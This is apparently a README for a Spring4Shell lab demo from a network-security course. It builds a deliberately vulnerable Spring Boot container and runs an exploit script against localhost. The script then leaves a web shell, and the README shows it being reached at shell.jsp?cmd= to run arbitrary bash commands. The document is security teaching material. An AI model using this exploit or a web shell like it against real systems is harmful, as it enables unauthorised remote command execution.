# Netsec Bonus: Spring4Shell Demo

## Build
### Requirements
- make (optional)
- podman (should work the same with docker)
- poetry (or just the [requests](https://pypi.org/project/requests/) library on the python module search path)

Make sure you're in the root directory of this project.

### Automated 
Change the `CONTAINER` variable to your container tech in `./Makefile` (probably docker?) and run:
```bash
make demo   # for an already built demo .war-file of the demo spring app
# or 
make run    # if you wan't to build the app from source (needs JDK)
```

### Manually
```bash
cd demo-container; podman build --tag ubuntu:netsec -f ./Dockerfile-Demo
podman run -p 8080:8080 --name netsec-demo --rm localhost/ubuntu:netsec
```

The demo app will be reachable at `http://localhost:8080/netsec/`.


## Exploit

```bash
# this venv is only needed for requests lib (skip if already globally installed)
poetry install
poetry shell

python exploit.py --url http://localhost:8080/netsec/greeting --method POST
# -- or --
python exploit.py --url http://localhost:8080/netsec/greeting2 --method GET
```

Now check <http://localhost:8080/shell.jsp?cmd=id> (replace id for any bash command).

## Background
Spring Boot updated Spring Framework to the patched version 5.3.18 in 2.6.6.

- Spring Boot version is fixed to 2.6.5 (see ./demo-app/pom.xml)
- Tomcat version is fixed to 8.5.77 (see ./demo-container/Dockerfile)

